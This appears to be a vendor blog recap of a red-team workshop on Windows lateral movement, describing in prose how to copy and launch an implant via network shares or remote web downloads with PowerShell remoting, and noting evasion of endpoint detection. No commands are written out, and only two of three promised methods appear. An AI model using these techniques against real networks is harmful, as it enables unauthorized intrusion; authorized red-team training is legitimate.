Lateral movement remains one of the most critical (and often most frustrating) components of red team campaigns. During this recent "Threat Thursday Live" session, the team explored practical techniques for achieving lateral movement using native tools available in most Windows environments. This method, known as "Living Off the Land," minimizes the use of external tools and maximizes stealth and compatibility across various networks.
Why Lateral Movement Matters
As networks grow more complex with segmentation and security tooling, moving from one host to another (lateral movement) becomes essential for maintaining access and expanding control during red team operations. This session focused on how to achieve this within the SCYTHE platform using three practical, pre-validated methods that require only PowerShell remoting.
Method 1: Using Network Shares
Pre-Requisites
- PowerShell Remoting (PS Remoting) enabled on target systems.
- Knowledge of reachable hosts (via Test-WSMan and Get-ADComputer).
Steps
- Identify reachable machines using a PowerShell one-liner that queries Active Directory and checks for PS Remoting availability.
- Create a shared drive, if one doesn’t already exist. Use:
- Copy the implant to the shared drive using simple file operations.
- Map the shared drive on the remote system via net use.
- Copy the implant from the shared drive to a local path on the remote system.
- Execute the implant using CMD /C start to ensure it runs in the background.
Tip: Using existing shared drives reduces the need for creating artifacts and lowers the risk of detection.
Method 2: Direct WGET via Info Command
This method simplifies the process by removing the need for shared drives.
Steps
- Use the info command to run a wget-style command (Invoke-WebRequest) remotely:
- Confirm file presence with Get-ChildItem.
- Start execution with CMD /C start.
This method is less noisy and ideal for environments where file transfer via shared drives is restricted or monitored.
Security Implications and Detection Challenges
All three methods rely on tools native to Windows—PowerShell, network shares, WinRS—making them harder to detect using traditional security tools. These techniques exemplify "living off the land" by:
- Using no additional software
- Bypassing common security controls
- Operating under the radar of endpoint detection systems
Final Thoughts
While these methods are not necessarily stealthy by default, they are adaptable and automation-friendly. With some tuning, they can become part of advanced, modular campaigns. Future sessions may expand on chaining these techniques with persistence methods or leveraging PS Web Access for even broader reach.
Join our upcoming sessions: https://scythe.io/workshops
